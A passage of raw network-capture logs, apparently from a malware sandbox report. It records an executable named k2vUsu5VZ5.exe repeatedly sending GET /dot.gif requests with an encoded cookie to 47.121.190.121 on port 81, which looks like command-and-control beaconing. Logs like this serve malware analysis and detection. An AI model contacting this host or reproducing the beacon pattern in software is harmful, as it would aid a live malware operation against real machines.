              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:27:58.395900011 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:58 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              55192.168.2.44981847.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:27:58.514369011 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:27:59.623790979 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:27:59 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              56192.168.2.44982447.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:27:59.747189999 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:00.692666054 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:00 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              57192.168.2.44983047.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:28:00.809634924 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:01.758723974 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:01 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              58192.168.2.44983747.121.190.12181
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:28:01.874717951 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:02.810645103 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:02 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              59192.168.2.44984147.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:28:02.943342924 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:03.988145113 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:03 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              60 | 192.168.2.4 | 49849 | 47.121.190.121 | 81 | 7148 | C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Timestamp | Bytes transferred | Direction | Data
              Jan 9, 2025 18:28:04.231498003 CET | 386 | OUT | GET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:05.321083069 CET | 114 | IN | HTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:05 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              61 | 192.168.2.4 | 49856 | 47.121.190.121 | 81 | 7148 | C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Timestamp | Bytes transferred | Direction | Data
              Jan 9, 2025 18:28:05.452390909 CET | 386 | OUT | GET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:06.413224936 CET | 114 | IN | HTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:06 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              62 | 192.168.2.4 | 49863 | 47.121.190.121 | 81 | 7148 | C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Timestamp | Bytes transferred | Direction | Data
              Jan 9, 2025 18:28:06.528783083 CET | 386 | OUT | GET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:07.532258034 CET | 114 | IN | HTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:07 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              63 | 192.168.2.4 | 49873 | 47.121.190.121 | 81 | 7148 | C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Timestamp | Bytes transferred | Direction | Data
              Jan 9, 2025 18:28:07.653525114 CET | 386 | OUT | GET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:08.601628065 CET | 114 | IN | HTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:08 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              64 | 192.168.2.4 | 49879 | 47.121.190.121 | 81 | 7148 | C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Timestamp | Bytes transferred | Direction | Data
              Jan 9, 2025 18:28:08.745033026 CET | 386 | OUT | GET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:09.788600922 CET | 114 | IN | HTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:09 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              65 | 192.168.2.4 | 49886 | 47.121.190.121 | 81 | 7148 | C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Timestamp | Bytes transferred | Direction | Data
              Jan 9, 2025 18:28:09.904177904 CET | 386 | OUT | GET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:10.873101950 CET | 114 | IN | HTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:10 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              66 | 192.168.2.4 | 49893 | 47.121.190.121 | 81 | 7148 | C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Timestamp | Bytes transferred | Direction | Data
              Jan 9, 2025 18:28:10.986663103 CET | 386 | OUT | GET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:11.954770088 CET | 114 | IN | HTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:11 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              67 | 192.168.2.4 | 49902 | 47.121.190.121 | 81 | 7148 | C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Timestamp | Bytes transferred | Direction | Data
              Jan 9, 2025 18:28:12.075596094 CET | 386 | OUT | GET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:13.119453907 CET | 114 | IN | HTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:12 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              68 | 192.168.2.4 | 49909 | 47.121.190.121 | 81 | 7148 | C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Timestamp | Bytes transferred | Direction | Data
              Jan 9, 2025 18:28:13.236175060 CET | 386 | OUT | GET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:14.194960117 CET | 114 | IN | HTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:14 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              69 | 192.168.2.4 | 49916 | 47.121.190.121 | 81 | 7148 | C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Timestamp | Bytes transferred | Direction | Data
              Jan 9, 2025 18:28:14.310036898 CET | 386 | OUT | GET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:15.252454042 CET | 114 | IN | HTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:15 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              70 | 192.168.2.4 | 49926 | 47.121.190.121 | 81 | 7148 | C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Timestamp | Bytes transferred | Direction | Data
              Jan 9, 2025 18:28:15.371932983 CET | 386 | OUT | GET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:16.440069914 CET | 114 | IN | HTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:16 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              71 | 192.168.2.4 | 49932 | 47.121.190.121 | 81 | 7148 | C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Timestamp | Bytes transferred | Direction | Data
              Jan 9, 2025 18:28:16.668273926 CET | 386 | OUT | GET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:17.614890099 CET | 114 | IN | HTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:17 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              72 | 192.168.2.4 | 49939 | 47.121.190.121 | 81 | 7148 | C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Timestamp | Bytes transferred | Direction | Data
              Jan 9, 2025 18:28:17.754844904 CET | 386 | OUT | GET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:18.708796978 CET | 114 | IN | HTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:18 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              73 | 192.168.2.4 | 49948 | 47.121.190.121 | 81 | 7148 | C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Timestamp | Bytes transferred | Direction | Data
              Jan 9, 2025 18:28:18.860543013 CET | 386 | OUT | GET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:19.801464081 CET | 114 | IN | HTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:19 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              74 | 192.168.2.4 | 49955 | 47.121.190.121 | 81 | 7148 | C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Timestamp | Bytes transferred | Direction | Data
              Jan 9, 2025 18:28:19.936959028 CET | 386 | OUT | GET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:20.911350012 CET | 114 | IN | HTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:20 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              75 | 192.168.2.4 | 49963 | 47.121.190.121 | 81 | 7148 | C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Timestamp | Bytes transferred | Direction | Data
              Jan 9, 2025 18:28:21.046225071 CET | 386 | OUT | GET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:22.022670984 CET | 114 | IN | HTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:21 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              76 | 192.168.2.4 | 49971 | 47.121.190.121 | 81 | 7148 | C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Timestamp | Bytes transferred | Direction | Data
              Jan 9, 2025 18:28:22.217961073 CET | 386 | OUT | GET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:23.167850018 CET | 114 | IN | HTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:23 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              77 | 192.168.2.4 | 49978 | 47.121.190.121 | 81 | 7148 | C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Timestamp | Bytes transferred | Direction | Data
              Jan 9, 2025 18:28:23.297537088 CET | 386 | OUT | GET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:24.294481039 CET | 114 | IN | HTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:24 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              78 | 192.168.2.4 | 49988 | 47.121.190.121 | 81 | 7148 | C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Timestamp | Bytes transferred | Direction | Data
              Jan 9, 2025 18:28:24.671117067 CET | 386 | OUT | GET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:25.657701969 CET | 114 | IN | HTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:25 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              79 | 192.168.2.4 | 49996 | 47.121.190.121 | 81 | 7148 | C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Timestamp | Bytes transferred | Direction | Data
              Jan 9, 2025 18:28:25.953855038 CET | 386 | OUT | GET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:27.021359921 CET | 114 | IN | HTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:26 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              80 | 192.168.2.4 | 50005 | 47.121.190.121 | 81 | 7148 | C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Timestamp | Bytes transferred | Direction | Data
              Jan 9, 2025 18:28:27.302829027 CET | 386 | OUT | GET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:28.241074085 CET | 114 | IN | HTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:28 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              81 | 192.168.2.4 | 50012 | 47.121.190.121 | 81 | 7148 | C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Timestamp | Bytes transferred | Direction | Data
              Jan 9, 2025 18:28:28.358308077 CET | 386 | OUT | GET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
